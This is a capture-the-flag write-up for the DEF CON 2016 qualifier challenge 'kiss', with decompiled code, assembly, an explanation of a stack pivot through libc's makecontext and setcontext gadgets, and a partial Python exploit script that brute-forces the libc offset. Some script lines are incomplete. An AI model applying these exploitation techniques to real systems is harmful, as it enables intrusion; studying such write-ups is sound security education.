defcon qual 2016 kiss writeup
05 Jun 2016This problem is simple assembly challenge.
void mamama()
int v0; // ebx@1
__int64 v1; // rdi@1
unsigned __int64 v2; // rbx@1
unsigned __int64 v3; // rax@1
void *v4; // rbp@2
unsigned __int64 v5; // rax@2
unsigned __int64 buf; // [sp+8h] [bp-20h]@1
write(1, "KISS - Keep It Simple Stupid\n", 0x1DuLL);
v0 = open("/dev/urandom", 0);
read(v0, &buf, 8uLL);
v1 = buf & 0x7FF;
buf &= 0x7FFu;
v2 = (unsigned __int64)malloc(v1) & 0xFFFFFFFFFFFFF000LL;
write(1, "Buffer is around ", 0x11uLL);
write(1, "\n", 1uLL);
write(1, "Binary is around ", 0x11uLL);
write_pointer((unsigned __int64)mamama & 0xFFFFFFFFFFFFF000LL);
write(1, "\n", 1uLL);
write(1, "How big of a buffer do you want? ", 0x21uLL);
v3 = sub_CE0();
buf = v3;
if ( v3 <= 0xA00 )
v4 = malloc(v3);
write(1, "Waiting for data.\n", 0x12uLL);
sub_C90(v4, buf);
write(1, "What location shall we attempt? ", 0x20uLL);
v5 = sub_CE0();
buf = v5;
if ( v2 <= v5 && v5 <= v2 + 0x1E00 )
write(1, "Good luck!\n", 0xBuLL);
JUMPOUT(__CS__, ****(_QWORD ****)buf);
write(1, "Invalid location.\n", 0x12uLL);
write(1, "Invalid size\n", 0xDuLL);
I can receive heap pointer and binary base approximately, so it seems easy. but between write and JUMPOUT, there are terrible assembly codes.
.text:0000000000000A3F call _write
.text:0000000000000A44 mov rax, [rsp+28h+buf]
.text:0000000000000A49 xor rbx, rbx
.text:0000000000000A4C xor rcx, rcx
.text:0000000000000A73 xor rsp, rsp
.text:0000000000000ABE xorps xmm14, xmm14
.text:0000000000000AC2 xorps xmm15, xmm15
.text:0000000000000AC6 mov rbx, [rax]
.text:0000000000000AC9 mov rcx, [rbx]
.text:0000000000000ACC mov rdx, [rcx]
.text:0000000000000ACF jmp qword ptr [rdx]
so all registers set to 0 except rax, rbx, rcx, rdx. the critical problem is that WE CAN’T CALL ANY FUNCTIONS, also ret gadget can’t work.
the first thing what i done is find gadget which controls rsp. there was one in libc makecontext function.
.text:00000000000498B0 mov rsp, rbx
.text:00000000000498B3 pop rdi
.text:00000000000498B4 test rdi, rdi
.text:00000000000498B7 jz short loc_498C1
.text:00000000000498B9 call setcontext
.text:00000000000498BE mov rdi, rax
in addition, we can control full registers by setcontext, so all i did was put context structure in heap and jump to 0x498B0.
but how to find libc offset? In x86-64, difference between pie_base and libc_base is constant for one machine (I guess it happens when randomize_va_space < 2, but I’m not sure) . In my local machine, offset difference was 0x5ea000, so I brute-force the offset between 0x500000 and 0x600000. to sure it was right offset, i used EB FE (infinite loop) gadget. here is my exploit code.
import pwnbox
import struct
import random
debug = True
local = False
if local and debug:
p = pwnbox.pipe.ProcessPipe('gdb -q ./kiss')
elif local:
p = pwnbox.pipe.ProcessPipe('./kiss')
#p = pwnbox.pipe.SocketPipe('', 3155)\
p = pwnbox.pipe.SocketPipe('',30009)
if local and debug:
p.read_until('(gdb) ')
p.read_until('is around')
buf_base = int(p.read_until('\n'),16)
p.read_until('is around')
pie_base = int(p.read_until('\n'),16)
print '%x %x' % (buf_base, pie_base)
if local:
libc_base = 0x7ffff7a15000
offset = random.randint(0x500000,0x600000) & 0xfff000
#libc_base = pie_base - 0x5ea000
libc_base = pie_base - offset
print 'libc base : %x' % libc_base
if local and debug:
m = buf_base + 0x50
m = (buf_base + random.randint(0,0x800)) & 0xffffffffffffffffffffffffffffff8
rip = pie_base + 0x870
cont = open('sample_context','rb')
cont_data =
contextPayload = '\x00' * 0x200
#contextPayload = struct.pack('<QQ',m+24, libc_base + 0* 0x40FF5 + 1 * 0x498B0) + contextPayload[16:]
# 0xCF974 : setcontext gadget, 0x498B0 : infinite loop gadget(to find offset)
contextPayload = struct.pack('<QQ',m+24, libc_base + 1* 0xCF974 + 0 * 0x498B0) + contextPayload[16:]
contextPayload = contextPayload[0:0xE0] + struct.pack('<Q',m) + contextPayload[0xE8:]
r8 = 1
r9 = 2
r12 = 3
r13 = 4
r14 = 5
r15 = 15
rdi = 6
rsi = 7
rbp = 8
rbx = 9
rdx = 10
rcx = 11
retaddr = 0x12341234
rsp = m
regs = [r8, r9, 0, 0, r12, r13, r14, r15, libc_base + 0x17CCDB, rsi, rbp, rbx, rdx, 0, rcx, rsp, libc_base + 0x46640] # rdi + 0x28 ~ rdi + 0xA0
s = ''
for i in regs:
s = s + struct.pack("<Q", i)
contextPayload = contextPayload[0:0x28] + s + contextPayload[0xB0:]
payload = struct.pack('<QQ',m+8,m+16) + contextPayload
print contextPayload.encode('hex')
p.write('%x\n' % len(payload))
p.read_until('Waiting for data.')
p.write('%x\n' % m)